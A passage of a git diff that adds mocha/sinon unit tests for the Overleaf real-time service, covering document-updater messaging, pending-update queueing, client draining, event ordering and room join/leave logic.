'../../../app/js/DocumentUpdaterController' +) +const MockClient = require('./helpers/MockClient') + +describe('DocumentUpdaterController', function () { + beforeEach(function () { + this.project_id = 'project-id-123' + this.doc_id = 'doc-id-123' + this.callback = sinon.stub() + this.io = { mock: 'socket.io' } + this.rclient = [] + this.RoomEvents = { on: sinon.stub() } + this.EditorUpdatesController = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.settings = { + redis: { + documentupdater: { + key_schema: { + pendingUpdates({ doc_id: docId }) { + return `PendingUpdates:${docId}` + }, + }, + }, + pubsub: null, + }, + }), + './RedisClientManager': { + createClientList: () => { + this.redis = { + createClient: name => { + let rclientStub + this.rclient.push((rclientStub = { name })) + return rclientStub + }, + } + }, + }, + './SafeJsonParse': (this.SafeJsonParse = { + parse: (data, cb) => cb(null, JSON.parse(data)), + }), + './EventLogger': (this.EventLogger = { checkEventOrder: sinon.stub() }), + './HealthCheckManager': { check: sinon.stub() }, + '@overleaf/metrics': (this.metrics = { + inc: sinon.stub(), + histogram: sinon.stub(), + }), + './RoomManager': (this.RoomManager = { + eventSource: sinon.stub().returns(this.RoomEvents), + }), + './ChannelManager': (this.ChannelManager = {}), + }, + }) + }) + + describe('listenForUpdatesFromDocumentUpdater', function () { + beforeEach(function () { + this.rclient.length = 0 // clear any existing clients + this.EditorUpdatesController.rclientList = [ + this.redis.createClient('first'), + this.redis.createClient('second'), + ] + this.rclient[0].subscribe = sinon.stub() + this.rclient[0].on = sinon.stub() + this.rclient[1].subscribe = sinon.stub() + this.rclient[1].on = sinon.stub() + this.EditorUpdatesController.listenForUpdatesFromDocumentUpdater() + }) + + it('should subscribe to the doc-updater stream', function () { + this.rclient[0].subscribe.calledWith('applied-ops').should.equal(true) + }) + + it('should register a callback to handle updates', function () { + this.rclient[0].on.calledWith('message').should.equal(true) + }) + + it('should subscribe to any additional doc-updater stream', function () { + this.rclient[1].subscribe.calledWith('applied-ops').should.equal(true) + this.rclient[1].on.calledWith('message').should.equal(true) + }) + }) + + describe('_processMessageFromDocumentUpdater', function () { + describe('with bad JSON', function () { + beforeEach(function () { + this.SafeJsonParse.parse = sinon + .stub() + .callsArgWith(1, new Error('oops')) + return this.EditorUpdatesController._processMessageFromDocumentUpdater( + this.io, + 'applied-ops', + 'blah' + ) + }) + + it('should log an error', function () { + return this.logger.error.called.should.equal(true) + }) + }) + + describe('with update', function () { + beforeEach(function () { + this.message = { + doc_id: this.doc_id, + op: { t: 'foo', p: 12 }, + } + this.EditorUpdatesController._applyUpdateFromDocumentUpdater = + sinon.stub() + return this.EditorUpdatesController._processMessageFromDocumentUpdater( + this.io, + 'applied-ops', + JSON.stringify(this.message) + ) + }) + + it('should apply the update', function () { + return this.EditorUpdatesController._applyUpdateFromDocumentUpdater + .calledWith(this.io, this.doc_id, this.message.op) + .should.equal(true) + }) + }) + + describe('with error', function () { + beforeEach(function () { + this.message = { + doc_id: this.doc_id, + error: 'Something went wrong', + } + this.EditorUpdatesController._processErrorFromDocumentUpdater = + sinon.stub() + return this.EditorUpdatesController._processMessageFromDocumentUpdater( + this.io, + 'applied-ops', + JSON.stringify(this.message) + ) + }) + + return it('should process the error', function () { + return this.EditorUpdatesController._processErrorFromDocumentUpdater + .calledWith(this.io, this.doc_id, this.message.error) + .should.equal(true) + }) + }) + }) + + describe('_applyUpdateFromDocumentUpdater', function () { + beforeEach(function () { + this.sourceClient = new MockClient() + this.otherClients = [new MockClient(), new MockClient()] + this.update = { + op: [{ t: 'foo', p: 12 }], + meta: { source: this.sourceClient.publicId }, + v: (this.version = 42), + doc: this.doc_id, + } + return (this.io.sockets = { + clients: sinon + .stub() + .returns([ + this.sourceClient, + ...Array.from(this.otherClients), + this.sourceClient, + ]), + }) + }) // include a duplicate client + + describe('normally', function () { + beforeEach(function () { + return this.EditorUpdatesController._applyUpdateFromDocumentUpdater( + this.io, + this.doc_id, + this.update + ) + }) + + it('should send a version bump to the source client', function () { + this.sourceClient.emit + .calledWith('otUpdateApplied', { v: this.version, doc: this.doc_id }) + .should.equal(true) + return this.sourceClient.emit.calledOnce.should.equal(true) + }) + + it('should get the clients connected to the document', function () { + return this.io.sockets.clients + .calledWith(this.doc_id) + .should.equal(true) + }) + + return it('should send the full update to the other clients', function () { + return Array.from(this.otherClients).map(client => + client.emit + .calledWith('otUpdateApplied', this.update) + .should.equal(true) + ) + }) + }) + + return describe('with a duplicate op', function () { + beforeEach(function () { + this.update.dup = true + return this.EditorUpdatesController._applyUpdateFromDocumentUpdater( + this.io, + this.doc_id, + this.update + ) + }) + + it('should send a version bump to the source client as usual', function () { + return this.sourceClient.emit + .calledWith('otUpdateApplied', { v: this.version, doc: this.doc_id }) + .should.equal(true) + }) + + return it("should not send anything to the other clients (they've already had the op)", function () { + return Array.from(this.otherClients).map(client => + client.emit.calledWith('otUpdateApplied').should.equal(false) + ) + }) + }) + }) + + return describe('_processErrorFromDocumentUpdater', function () { + beforeEach(function () { + this.clients = [new MockClient(), new MockClient()] + this.io.sockets = { clients: sinon.stub().returns(this.clients) } + return this.EditorUpdatesController._processErrorFromDocumentUpdater( + this.io, + this.doc_id, + 'Something went wrong' + ) + }) + + it('should log a warning', function () { + return this.logger.warn.called.should.equal(true) + }) + + return it('should disconnect all clients in that document', function () { + this.io.sockets.clients.calledWith(this.doc_id).should.equal(true) + return Array.from(this.clients).map(client => + client.disconnect.called.should.equal(true) + ) + }) + }) +}) diff --git a/services/real-time/test/unit/js/DocumentUpdaterManagerTests.js b/services/real-time/test/unit/js/DocumentUpdaterManagerTests.js new file mode 100644 index 0000000..6dea540 --- /dev/null +++ b/services/real-time/test/unit/js/DocumentUpdaterManagerTests.js @@ -0,0 +1,423 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const SandboxedModule = require('sandboxed-module') +const path = require('node:path') +const modulePath = '../../../app/js/DocumentUpdaterManager' +const _ = require('lodash') + +describe('DocumentUpdaterManager', function () { + beforeEach(function () { + let Timer + this.project_id = 'project-id-923' + this.doc_id = 'doc-id-394' + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.settings = { + apis: { documentupdater: { url: 'http://doc-updater.example.com' } }, + redis: { + documentupdater: { + key_schema: { + pendingUpdates({ doc_id: docId }) { + return `PendingUpdates:${docId}` + }, + }, + }, + }, + maxUpdateSize: 7 * 1024 * 1024, + pendingUpdateListShardCount: 10, + } + this.rclient = { auth() {} } + + return (this.DocumentUpdaterManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': this.settings, + request: (this.request = {}), + '@overleaf/redis-wrapper': { createClient: () => this.rclient }, + '@overleaf/metrics': (this.Metrics = { + summary: sinon.stub(), + Timer: (Timer = class Timer { + done() {} + }), + }), + }, + })) + }) // avoid modifying JSON object directly + + describe('getDocument', function () { + beforeEach(function () { + return (this.callback = sinon.stub()) + }) + + describe('successfully', function () { + beforeEach(function () { + this.body = JSON.stringify({ + lines: this.lines, + version: this.version, + ops: (this.ops = ['mock-op-1', 'mock-op-2']), + ranges: (this.ranges = { mock: 'ranges' }), + }) + this.fromVersion = 2 + this.request.get = sinon + .stub() + .callsArgWith(1, null, { statusCode: 200 }, this.body) + return this.DocumentUpdaterManager.getDocument( + this.project_id, + this.doc_id, + this.fromVersion, + this.callback + ) + }) + + it('should get the document from the document updater', function () { + const url = `${this.settings.apis.documentupdater.url}/project/${this.project_id}/doc/${this.doc_id}?fromVersion=${this.fromVersion}` + return this.request.get.calledWith(url).should.equal(true) + }) + + return it('should call the callback with the lines, version, ranges and ops', function () { + return this.callback + .calledWith(null, this.lines, this.version, this.ranges, this.ops) + .should.equal(true) + }) + }) + + describe('when the document updater API returns an error', function () { + beforeEach(function () { + this.request.get = sinon + .stub() + .callsArgWith( + 1, + (this.error = new Error('something went wrong')), + null, + null + ) + return this.DocumentUpdaterManager.getDocument( + this.project_id, + this.doc_id, + this.fromVersion, + this.callback + ) + }) + + return it('should return an error to the callback', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + ;[404, 422].forEach(statusCode => + describe(`when the document updater returns a ${statusCode} status code`, function () { + beforeEach(function () { + this.request.get = sinon + .stub() + .callsArgWith(1, null, { statusCode }, '') + return this.DocumentUpdaterManager.getDocument( + this.project_id, + this.doc_id, + this.fromVersion, + this.callback + ) + }) + + return it('should return the callback with an error', function () { + this.callback.called.should.equal(true) + this.callback + .calledWith( + sinon.match({ + message: 'doc updater could not load requested ops', + info: { statusCode }, + }) + ) + .should.equal(true) + this.logger.error.called.should.equal(false) + this.logger.warn.called.should.equal(false) + }) + }) + ) + + return describe('when the document updater returns a failure error code', function () { + beforeEach(function () { + this.request.get = sinon + .stub() + .callsArgWith(1, null, { statusCode: 500 }, '') + return this.DocumentUpdaterManager.getDocument( + this.project_id, + this.doc_id, + this.fromVersion, + this.callback + ) + }) + + return it('should return the callback with an error', function () { + this.callback.called.should.equal(true) + this.callback + .calledWith( + sinon.match({ + message: 'doc updater returned a non-success status code', + info: { + action: 'getDocument', + statusCode: 500, + }, + }) + ) + .should.equal(true) + this.logger.error.called.should.equal(false) + }) + }) + }) + + describe('flushProjectToMongoAndDelete', function () { + beforeEach(function () { + return (this.callback = sinon.stub()) + }) + + describe('successfully', function () { + beforeEach(function () { + this.request.del = sinon + .stub() + .callsArgWith(1, null, { statusCode: 204 }, '') + return this.DocumentUpdaterManager.flushProjectToMongoAndDelete( + this.project_id, + this.callback + ) + }) + + it('should delete the project from the document updater', function () { + const url = `${this.settings.apis.documentupdater.url}/project/${this.project_id}?background=true` + return this.request.del.calledWith(url).should.equal(true) + }) + + return it('should call the callback with no error', function () { + return this.callback.calledWith(null).should.equal(true) + }) + }) + + describe('when the document updater API returns an error', function () { + beforeEach(function () { + this.request.del = sinon + .stub() + .callsArgWith( + 1, + (this.error = new Error('something went wrong')), + null, + null + ) + return this.DocumentUpdaterManager.flushProjectToMongoAndDelete( + this.project_id, + this.callback + ) + }) + + return it('should return an error to the callback', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + + return describe('when the document updater returns a failure error code', function () { + beforeEach(function () { + this.request.del = sinon + .stub() + .callsArgWith(1, null, { statusCode: 500 }, '') + return this.DocumentUpdaterManager.flushProjectToMongoAndDelete( + this.project_id, + this.callback + ) + }) + + return it('should return the callback with an error', function () { + this.callback.called.should.equal(true) + this.callback + .calledWith( + sinon.match({ + message: 'doc updater returned a non-success status code', + info: { + action: 'flushProjectToMongoAndDelete', + statusCode: 500, + }, + }) + ) + .should.equal(true) + }) + }) + }) + + describe('queueChange', function () { + beforeEach(function () { + this.change = { + doc: '1234567890', + op: [{ d: 'test', p: 345 }], + v: 789, + } + this.rclient.rpush = sinon.stub().yields() + return (this.callback = sinon.stub()) + }) + + describe('successfully', function () { + beforeEach(function () { + this.pendingUpdateListKey = `pending-updates-list-key-${Math.random()}` + + this.DocumentUpdaterManager._getPendingUpdateListKey = sinon + .stub() + .returns(this.pendingUpdateListKey) + this.DocumentUpdaterManager.queueChange( + this.project_id, + this.doc_id, + this.change, + this.callback + ) + }) + + it('should push the change', function () { + this.rclient.rpush + .calledWith( + `PendingUpdates:${this.doc_id}`, + JSON.stringify(this.change) + ) + .should.equal(true) + }) + + it('should notify the doc updater of the change via the pending-updates-list queue', function () { + this.rclient.rpush + .calledWith( + this.pendingUpdateListKey, + `${this.project_id}:${this.doc_id}` + ) + .should.equal(true) + }) + }) + + describe('with error talking to redis during rpush', function () { + beforeEach(function () { + this.rclient.rpush = sinon + .stub() + .yields(new Error('something went wrong')) + return this.DocumentUpdaterManager.queueChange( + this.project_id, + this.doc_id, + this.change, + this.callback + ) + }) + + return it('should return an error', function () { + return this.callback + .calledWithExactly(sinon.match(Error)) + .should.equal(true) + }) + }) + + describe('with null byte corruption', function () { + beforeEach(function () { + this.stringifyStub = sinon + .stub(JSON, 'stringify') + .callsFake(() => '["bad bytes! \u0000 <- here"]') + return this.DocumentUpdaterManager.queueChange( + this.project_id, + this.doc_id, + this.change, + this.callback + ) + }) + + afterEach(function () { + this.stringifyStub.restore() + }) + + it('should return an error', function () { + return this.callback + .calledWithExactly(sinon.match(Error)) + .should.equal(true) + }) + + return it('should not push the change onto the pending-updates-list queue', function () { + return this.rclient.rpush.called.should.equal(false) + }) + }) + + describe('when the update is too large', function () { + beforeEach(function () { + this.change = { + op: { p: 12, t: 'update is too large'.repeat(1024 * 400) }, + } + return this.DocumentUpdaterManager.queueChange( + this.project_id, + this.doc_id, + this.change, + this.callback + ) + }) + + it('should return an error', function () { + return this.callback + .calledWithExactly(sinon.match(Error)) + .should.equal(true) + }) + + it('should add the size to the error', function () { + return this.callback.args[0][0].info.updateSize.should.equal(7782422) + }) + + return it('should not push the change onto the pending-updates-list queue', function () { + return this.rclient.rpush.called.should.equal(false) + }) + }) + + describe('with invalid keys', function () { + beforeEach(function () { + this.change = { + op: [{ d: 'test', p: 345 }], + version: 789, // not a valid key + } + return this.DocumentUpdaterManager.queueChange( + this.project_id, + this.doc_id, + this.change, + this.callback + ) + }) + + it('should remove the invalid keys from the change', function () { + return this.rclient.rpush + .calledWith( + `PendingUpdates:${this.doc_id}`, + JSON.stringify({ op: this.change.op }) + ) + .should.equal(true) + }) + }) + }) + + describe('_getPendingUpdateListKey', function () { + beforeEach(function () { + const keys = _.times( + 10000, + this.DocumentUpdaterManager._getPendingUpdateListKey + ) + this.keys = _.uniq(keys) + }) + it('should return normal pending updates key', function () { + _.includes(this.keys, 'pending-updates-list').should.equal(true) + }) + + it('should return pending-updates-list-n keys', function () { + _.includes(this.keys, 'pending-updates-list-1').should.equal(true) + _.includes(this.keys, 'pending-updates-list-3').should.equal(true) + _.includes(this.keys, 'pending-updates-list-9').should.equal(true) + }) + + it('should not include pending-updates-list-0 key', function () { + _.includes(this.keys, 'pending-updates-list-0').should.equal(false) + }) + + it('should not include maximum as pendingUpdateListShardCount value', function () { + _.includes(this.keys, 'pending-updates-list-10').should.equal(false) + }) + }) +}) diff --git a/services/real-time/test/unit/js/DrainManagerTests.js b/services/real-time/test/unit/js/DrainManagerTests.js new file mode 100644 index 0000000..facdc56 --- /dev/null +++ b/services/real-time/test/unit/js/DrainManagerTests.js @@ -0,0 +1,127 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const SandboxedModule = require('sandboxed-module') +const path = require('node:path') +const modulePath = path.join(__dirname, '../../../app/js/DrainManager') + +describe('DrainManager', function () { + beforeEach(function () { + this.DrainManager = SandboxedModule.require(modulePath, {}) + return (this.io = { + sockets: { + clients: sinon.stub(), + }, + }) + }) + + describe('startDrainTimeWindow', function () { + beforeEach(function () { + this.clients = [] + for (let i = 0; i <= 5399; i++) { + this.clients[i] = { + id: i, + emit: sinon.stub(), + } + } + this.io.sockets.clients.returns(this.clients) + return (this.DrainManager.startDrain = sinon.stub()) + }) + + return it('should set a drain rate fast enough', function (done) { + this.DrainManager.startDrainTimeWindow(this.io, 9) + this.DrainManager.startDrain.calledWith(this.io, 10).should.equal(true) + return done() + }) + }) + + return describe('reconnectNClients', function () { + beforeEach(function () { + this.clients = [] + for (let i = 0; i <= 9; i++) { + this.clients[i] = { + id: i, + emit: sinon.stub(), + } + } + return this.io.sockets.clients.returns(this.clients) + }) + + return describe('after first pass', function () { + beforeEach(function () { + return this.DrainManager.reconnectNClients(this.io, 3) + }) + + it('should reconnect the first 3 clients', function () { + return [0, 1, 2].map(i => + this.clients[i].emit + .calledWith('reconnectGracefully') + .should.equal(true) + ) + }) + + it('should not reconnect any more clients', function () { + return [3, 4, 5, 6, 7, 8, 9].map(i => + this.clients[i].emit + .calledWith('reconnectGracefully') + .should.equal(false) + ) + }) + + return describe('after second pass', function () { + beforeEach(function () { + return this.DrainManager.reconnectNClients(this.io, 3) + }) + + it('should reconnect the next 3 clients', function () { + return [3, 4, 5].map(i => + this.clients[i].emit + .calledWith('reconnectGracefully') + .should.equal(true) + ) + }) + + it('should not reconnect any more clients', function () { + return [6, 7, 8, 9].map(i => + this.clients[i].emit + .calledWith('reconnectGracefully') + .should.equal(false) + ) + }) + + it('should not reconnect the first 3 clients again', function () { + return [0, 1, 2].map(i => + this.clients[i].emit.calledOnce.should.equal(true) + ) + }) + + return describe('after final pass', function () { + beforeEach(function () { + return this.DrainManager.reconnectNClients(this.io, 100) + }) + + it('should not reconnect the first 6 clients again', function () { + return [0, 1, 2, 3, 4, 5].map(i => + this.clients[i].emit.calledOnce.should.equal(true) + ) + }) + + return it('should log out that it reached the end', function () { + return this.logger.info + .calledWith('All clients have been told to reconnectGracefully') + .should.equal(true) + }) + }) + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/EventLoggerTests.js b/services/real-time/test/unit/js/EventLoggerTests.js new file mode 100644 index 0000000..037f2e2 --- /dev/null +++ b/services/real-time/test/unit/js/EventLoggerTests.js @@ -0,0 +1,153 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') +const SandboxedModule = require('sandboxed-module') +const modulePath = '../../../app/js/EventLogger' +const sinon = require('sinon') +const tk = require('timekeeper') + +describe('EventLogger', function () { + beforeEach(function () { + this.start = Date.now() + tk.freeze(new Date(this.start)) + this.EventLogger = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/metrics': (this.metrics = { inc: sinon.stub() }), + }, + }) + this.channel = 'applied-ops' + this.id_1 = 'random-hostname:abc-1' + this.message_1 = 'message-1' + this.id_2 = 'random-hostname:abc-2' + return (this.message_2 = 'message-2') + }) + + afterEach(function () { + return tk.reset() + }) + + return describe('checkEventOrder', function () { + describe('when the events are in order', function () { + beforeEach(function () { + this.EventLogger.checkEventOrder( + this.channel, + this.id_1, + this.message_1 + ) + return (this.status = this.EventLogger.checkEventOrder( + this.channel, + this.id_2, + this.message_2 + )) + }) + + it('should accept events in order', function () { + return expect(this.status).to.be.undefined + }) + + return it('should increment the valid event metric', function () { + return this.metrics.inc + .calledWith(`event.${this.channel}.valid`) + .should.equals(true) + }) + }) + + describe('when there is a duplicate events', function () { + beforeEach(function () { + this.EventLogger.checkEventOrder( + this.channel, + this.id_1, + this.message_1 + ) + return (this.status = this.EventLogger.checkEventOrder( + this.channel, + this.id_1, + this.message_1 + )) + }) + + it('should return "duplicate" for the same event', function () { + return expect(this.status).to.equal('duplicate') + }) + + return it('should increment the duplicate event metric', function () { + return this.metrics.inc + .calledWith(`event.${this.channel}.duplicate`) + .should.equals(true) + }) + }) + + describe('when there are out of order events', function () { + beforeEach(function () { + this.EventLogger.checkEventOrder( + this.channel, + this.id_1, + this.message_1 + ) + this.EventLogger.checkEventOrder( + this.channel, + this.id_2, + this.message_2 + ) + return (this.status = this.EventLogger.checkEventOrder( + this.channel, + this.id_1, + this.message_1 + )) + }) + + it('should return "out-of-order" for the event', function () { + return expect(this.status).to.equal('out-of-order') + }) + + return it('should increment the out-of-order event metric', function () { + return this.metrics.inc + .calledWith(`event.${this.channel}.out-of-order`) + .should.equals(true) + }) + }) + + return describe('after MAX_STALE_TIME_IN_MS', function () { + return it('should flush old entries', function () { + let status + this.EventLogger.MAX_EVENTS_BEFORE_CLEAN = 10 + this.EventLogger.checkEventOrder( + this.channel, + this.id_1, + this.message_1 + ) + for (let i = 1; i <= 8; i++) { + status = this.EventLogger.checkEventOrder( + this.channel, + this.id_1, + this.message_1 + ) + expect(status).to.equal('duplicate') + } + // the next event should flush the old entries aboce + this.EventLogger.MAX_STALE_TIME_IN_MS = 1000 + tk.freeze(new Date(this.start + 5 * 1000)) + // because we flushed the entries this should not be a duplicate + this.EventLogger.checkEventOrder( + this.channel, + 'other-1', + this.message_2 + ) + status = this.EventLogger.checkEventOrder( + this.channel, + this.id_1, + this.message_1 + ) + return expect(status).to.be.undefined + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/RoomManagerTests.js b/services/real-time/test/unit/js/RoomManagerTests.js new file mode 100644 index 0000000..f33d2ec --- /dev/null +++ b/services/real-time/test/unit/js/RoomManagerTests.js @@ -0,0 +1,412 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, + promise/param-names, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') +const sinon = require('sinon') +const modulePath = '../../../app/js/RoomManager.js' +const SandboxedModule = require('sandboxed-module') + +describe('RoomManager', function () { + beforeEach(function () { + this.project_id = 'project-id-123' + this.doc_id = 'doc-id-456' + this.other_doc_id = 'doc-id-789' + this.client = { namespace: { name: '' }, id: 'first-client' } + this.RoomManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.settings = {}), + '@overleaf/metrics': (this.metrics = { gauge: sinon.stub() }), + }, + }) + this.RoomManager._clientsInRoom = sinon.stub() + this.RoomManager._clientAlreadyInRoom = sinon.stub() + this.RoomEvents = this.RoomManager.eventSource() + sinon.spy(this.RoomEvents, 'emit') + return sinon.spy(this.RoomEvents, 'once') + }) + + describe('emitOnCompletion', function () { + return describe('when a subscribe errors', function () { + afterEach(function () { + return process.removeListener('unhandledRejection', this.onUnhandled) + }) + + beforeEach(function (done) { + this.onUnhandled = error => { + this.unhandledError = error + return done(new Error(`unhandledRejection: ${error.message}`)) + } + process.on('unhandledRejection', this.onUnhandled) + + let reject + const subscribePromise = new Promise((_, r) => (reject = r)) + const promises = [subscribePromise] + const eventName = 'project-subscribed-123' + this.RoomEvents.once(eventName, () => setTimeout(done, 100)) + this.RoomManager.emitOnCompletion(promises, eventName) + return setTimeout(() => reject(new Error('subscribe failed'))) + }) + + return it('should keep going', function () { + return expect(this.unhandledError).to.not.exist + }) + }) + }) + + describe('joinProject', function () { + describe('when the project room is empty', function () { + beforeEach(function (done) { + this.RoomManager._clientsInRoom + .withArgs(this.client, this.project_id) + .onFirstCall() + .returns(0) + this.client.join = sinon.stub() + this.callback = sinon.stub() + this.RoomEvents.on('project-active', id => { + return setTimeout(() => { + return this.RoomEvents.emit(`project-subscribed-${id}`) + }, 100) + }) + return this.RoomManager.joinProject( + this.client, + this.project_id, + err => { + this.callback(err) + return done() + } + ) + }) + + it("should emit a 'project-active' event with the id", function () { + return this.RoomEvents.emit + .calledWithExactly('project-active', this.project_id) + .should.equal(true) + }) + + it("should listen for the 'project-subscribed-id' event", function () { + return this.RoomEvents.once + .calledWith(`project-subscribed-${this.project_id}`) + .should.equal(true) + }) + + return it('should join the room using the id', function () { + return this.client.join + .calledWithExactly(this.project_id) + .should.equal(true) + }) + }) + + return describe('when there are other clients in the project room', function () { + beforeEach(function (done) { + this.RoomManager._clientsInRoom + .withArgs(this.client, this.project_id) + .onFirstCall() + .returns(123) + .onSecondCall() + .returns(124) + this.client.join = sinon.stub() + this.RoomManager.joinProject(this.client, this.project_id, done) + }) + + it('should join the room using the id', function () { + return this.client.join.called.should.equal(true) + }) + + return it('should not emit any events', function () { + return this.RoomEvents.emit.called.should.equal(false) + }) + }) + }) + + describe('joinDoc', function () { + describe('when the doc room is empty', function () { + beforeEach(function (done) { + this.RoomManager._clientsInRoom + .withArgs(this.client, this.doc_id) + .onFirstCall() + .returns(0) + this.client.join = sinon.stub() + this.callback = sinon.stub() + this.RoomEvents.on('doc-active', id => { + return setTimeout(() => { + return this.RoomEvents.emit(`doc-subscribed-${id}`) + }, 100) + }) + return this.RoomManager.joinDoc(this.client, this.doc_id, err => { + this.callback(err) + return done() + }) + }) + + it("should emit a 'doc-active' event with the id", function () { + return this.RoomEvents.emit + .calledWithExactly('doc-active', this.doc_id) + .should.equal(true) + }) + + it("should listen for the 'doc-subscribed-id' event", function () { + return this.RoomEvents.once + .calledWith(`doc-subscribed-${this.doc_id}`) + .should.equal(true) + }) + + return it('should join the room using the id', function () { + return this.client.join + .calledWithExactly(this.doc_id) + .should.equal(true) + }) + }) + + return describe('when there are other clients in the doc room', function () { + beforeEach(function (done) { + this.RoomManager._clientsInRoom + .withArgs(this.client, this.doc_id) + .onFirstCall() + .returns(123) + .onSecondCall() + .returns(124) + this.client.join = sinon.stub() + this.RoomManager.joinDoc(this.client, this.doc_id, done) + }) + + it('should join the room using the id', function () { + return this.client.join.called.should.equal(true) + }) + + return it('should not emit any events', function () { + return this.RoomEvents.emit.called.should.equal(false) + }) + }) + }) + + describe('leaveDoc', function () { + describe('when doc room will be empty after this client has left', function () { + beforeEach(function () { + this.RoomManager._clientAlreadyInRoom + .withArgs(this.client, this.doc_id) + .returns(true) + this.RoomManager._clientsInRoom + .withArgs(this.client, this.doc_id) + .onCall(0) + .returns(0) + this.client.leave = sinon.stub() + return this.RoomManager.leaveDoc(this.client, this.doc_id) + }) + + it('should leave the room using the id', function () { + return this.client.leave + .calledWithExactly(this.doc_id) + .should.equal(true) + }) + + return it("should emit a 'doc-empty' event with the id", function () { + return this.RoomEvents.emit + .calledWithExactly('doc-empty', this.doc_id) + .should.equal(true) + }) + }) + + describe('when there are other clients in the doc room', function () { + beforeEach(function () { + this.RoomManager._clientAlreadyInRoom + .withArgs(this.client, this.doc_id) + .returns(true) + this.RoomManager._clientsInRoom + .withArgs(this.client, this.doc_id) + .onCall(0) + .returns(123) + this.client.leave = sinon.stub() + return this.RoomManager.leaveDoc(this.client, this.doc_id) + }) + + it('should leave the room using the id', function () { + return this.client.leave + .calledWithExactly(this.doc_id) + .should.equal(true) + }) + + return it('should not emit any events', function () { + return this.RoomEvents.emit.called.should.equal(false) + }) + }) + + return describe('when the client is not in the doc room', function () { + beforeEach(function () { + this.RoomManager._clientAlreadyInRoom + .withArgs(this.client, this.doc_id) + .returns(false) + this.RoomManager._clientsInRoom + .withArgs(this.client, this.doc_id) + .onCall(0) + .returns(0) + this.client.leave = sinon.stub() + return this.RoomManager.leaveDoc(this.client, this.doc_id) + }) + + it('should not leave the room', function () { + return this.client.leave.called.should.equal(false) + }) + + return it('should not emit any events', function () { + return this.RoomEvents.emit.called.should.equal(false) + }) + }) + }) + + return describe('leaveProjectAndDocs', function () { + return describe('when the client is connected to the project and multiple docs', function () { + beforeEach(function () { + this.RoomManager._roomsClientIsIn = sinon + .stub() + .returns([this.project_id, this.doc_id, this.other_doc_id]) + this.client.join = sinon.stub() + return (this.client.leave = sinon.stub()) + }) + + describe('when this is the only client connected', function () { + beforeEach(function (done) { + // first call is for the join, + // second for the leave + this.RoomManager._clientsInRoom + .withArgs(this.client, this.doc_id) + .onCall(0) + .returns(0) + .onCall(1) + .returns(0) + this.RoomManager._clientsInRoom + .withArgs(this.client, this.other_doc_id) + .onCall(0) + .returns(0) + .onCall(1) + .returns(0) + this.RoomManager._clientsInRoom + .withArgs(this.client, this.project_id) + .onCall(0) + .returns(0) + .onCall(1) + .returns(0) + this.RoomManager._clientAlreadyInRoom + .withArgs(this.client, this.doc_id) + .returns(true) + .withArgs(this.client, this.other_doc_id) + .returns(true) + .withArgs(this.client, this.project_id) + .returns(true) + this.RoomEvents.on('project-active', id => { + return setTimeout(() => { + return this.RoomEvents.emit(`project-subscribed-${id}`) + }, 100) + }) + this.RoomEvents.on('doc-active', id => { + return setTimeout(() => { + return this.RoomEvents.emit(`doc-subscribed-${id}`) + }, 100) + }) + // put the client in the rooms + return this.RoomManager.joinProject( + this.client, + this.project_id, + () => { + return this.RoomManager.joinDoc(this.client, this.doc_id, () => { + return this.RoomManager.joinDoc( + this.client, + this.other_doc_id, + () => { + // now leave the project + this.RoomManager.leaveProjectAndDocs(this.client) + return done() + } + ) + }) + } + ) + }) + + it('should leave all the docs', function () { + this.client.leave.calledWithExactly(this.doc_id).should.equal(true) + return this.client.leave + .calledWithExactly(this.other_doc_id) + .should.equal(true) + }) + + it('should leave the project', function () { + return this.client.leave + .calledWithExactly(this.project_id) + .should.equal(true) + }) + + it("should emit a 'doc-empty' event with the id for each doc", function () { + this.RoomEvents.emit + .calledWithExactly('doc-empty', this.doc_id) + .should.equal(true) + return this.RoomEvents.emit + .calledWithExactly('doc-empty', this.other_doc_id) + .should.equal(true) + }) + + return it("should emit a 'project-empty' event with the id for the project", function () { + return this.RoomEvents.emit + .calledWithExactly('project-empty', this.project_id) + .should.equal(true) + }) + }) + + return describe('when other clients are still connected', function () { + beforeEach(function () { + this.RoomManager._clientsInRoom + .withArgs(this.client, this.doc_id) + .onFirstCall() + .returns(123) + .onSecondCall() + .returns(122) + this.RoomManager._clientsInRoom + .withArgs(this.client, this.other_doc_id) + .onFirstCall() + .returns(123) + .onSecondCall() + .returns(122) + this.RoomManager._clientsInRoom + .withArgs(this.client, this.project_id) + .onFirstCall() + .returns(123) + .onSecondCall() + .returns(122) + this.RoomManager._clientAlreadyInRoom + .withArgs(this.client, this.doc_id) + .returns(true) + .withArgs(this.client, this.other_doc_id) + .returns(true) + .withArgs(this.client, this.project_id) + .returns(true) + return this.RoomManager.leaveProjectAndDocs(this.client) + }) + + it('should leave all the docs', function () { + this.client.leave.calledWithExactly(this.doc_id).should.equal(true) + return this.client.leave + 